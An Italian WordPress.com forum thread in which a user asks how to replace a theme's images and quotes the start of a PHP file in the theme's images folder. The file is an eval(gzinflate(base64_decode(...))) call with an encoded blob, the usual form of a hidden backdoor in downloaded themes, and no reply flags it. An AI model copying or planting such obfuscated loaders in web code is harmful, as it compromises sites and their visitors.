Modifica immagini di un tema
-
Ciao a tutti,
volevo cambiare le immagini in un tema di wordpress, che ho già scaricato e installato…ho pensato di modificare semplicemente le immagini , salvarle con il vecchio nome e rifare l’upload… il fatto è che io stavo pensando di mettere una gif, mentre l’immagine originaria è in jpeg…quindi penso che anche chiamandolo con lo stesso nome e rifacendo l’upload non li riconosca in quanto il tipo di file risulta diverso ( da .jpeg a .gif ) da come è richiamata nel codice….come posso fare? Premetto che di php non conosco nulla, ho cercato tra i diversi file del tema ma non trovo proprio la parte dove è costruito effettivamente il tema, o almeno dove riguardava l’immagine, così da poter cambiare direttamente da lì l’url dell’immagine nuova….Ps: nella cartella immagini del tema che ho scaricato c’è, oltre alle immagini, una pagina php che però mi risulta davvero incomprensibile, in quanto c’è solo un’istruzione e poi un blocco di lettere e numeri e slash che sembrano quasi casuali
queste sono solo le prime righe, per intenderci, il resto continua tutto così
<? eval(gzinflate(base64_decode(‘FZjF0oZQYkRfZXaZFAvcKjKFuzubFM6Huz19/mHPglt9T5/mX//73//6R3Vlwz+b7zfVQ3ZU/9yP7f+2+YDRf+bZXhHY/5VVMZfVP/+DT2tZmP1IDEUw6C71SbTi3VIZV5+TY/dYSSpero che si sia capito il problema!
-
Non hai specificato l’indirizzo di un blog o la ragione del messaggio quando hai creato questo topic.
This support forum is for blogs hosted at WordPress.com. If your question is about a self-hosted WordPress blog then you’ll find help at the WordPress.org forums.
If you don’t understand the difference between WordPress.com and WordPress.org, you may find this information helpful.
If you forgot to include a link to your blog, you can reply and include it below. It’ll help people to answer your question.
This is an automated message.
-
Questo forum riguarda la piattaforma WordPress.com e non le installazioni del pacchetto WordPress su altri host.
Puoi porre la domanda sul forum di WordPress Italy:
http://www.wordpress-it.it/forum/
o sul forum ufficiale di WordPress.org (in inglese):
http://wordpress.org/support/
- L'argomento ‘Modifica immagini di un tema’ è chiuso a nuove risposte.